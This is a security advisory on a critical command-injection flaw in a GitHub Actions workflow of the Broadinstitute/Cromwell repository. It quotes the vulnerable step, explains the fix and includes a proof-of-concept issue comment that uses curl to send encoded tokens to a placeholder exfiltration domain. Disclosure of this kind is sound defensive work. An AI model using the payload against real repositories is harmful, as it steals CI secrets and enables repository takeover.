PT-2025-24345 — Broadinstitute/Cromwell

PT-2025-24345 · Github Actions · Broadinstitute/Cromwell

Published

2025-05-28

Updated

2025-05-28

CVSS v3.1

9.1

Critical

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Summary

Using Issue comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB TOKEN which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret:

BROADBOT GITHUB TOKEN

Details

The Issue comment in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script.

   - name: Check for ScalaFmt Comment
    id: check-comment
    run: |
     if [[ "${{ github.event name }}" == "issue comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then
      echo "::set-output name=comment-triggered::true"
     else
      echo "::set-output name=comment-triggered::false"
     fi

In this case, it is possible to exfiltrate GITHUB TOKEN and BROADBOT GITHUB TOKEN secrets.

PoC

To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow .github/workflows/update pylon issue.yml.

test" == "test" ]]; then
 & curl -s -d "$B64 BLOB" "https://$YOUR EXFIL DOMAIN/token" > /dev/null #

To prove this is possible, we created an issue and we added a comment with the malicious code to extract the GITHUB TOKEN and BROADBOT GITHUB TOKEN secret. With the GITHUB TOKEN extracted we were able to push a new poc tag which has been deleted after a couple of minutes.

Impact

Usually with GITHUB TOKEN and write permissions, an attacker is able to completely overtake the repo.

GITHUB TOKEN Permissions
 Actions: write
 Attestations: write
 Checks: write
 Contents: write
 Deployments: write
 Discussions: write
 Issues: write
 Metadata: read
 Models: read
 Packages: write
 Pages: write
 PullRequests: write
 RepositoryProjects: write
 SecurityEvents: write
 Statuses: write

We also checked BROADBOT GITHUB TOKEN permission to check if we could move laterally to org level. In this case the token seems scoped to this specific repo but it gives an attacker persistence without the need of a valid GITHUB TOKEN. We suggest to rotate the BROADBOT GITHUB TOKEN token asap.

Fix

Avoid directly interpolating untrusted user input into a shell script. Use GitHub Actions input context safely like:

- name: Dump comment
 run: echo "Comment Body: $BODY"
 env:
  BODY: ${{ github.event.comment.body }}

This safely passes the comment as an environment variable rather than interpolating it in-place.

Scope GIHTUB TOKEN permissions to just what the actions needs to do. In this case, if it's specific for issues:

permissions:
 issues: write

Kindly reported by @darryk10 @AlbertoPellitteri @loresuso

Fix

OS Command Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-78

Related Identifiers

GHSA-PHF6-HM3H-X8QP

Affected Products

Broadinstitute/Cromwell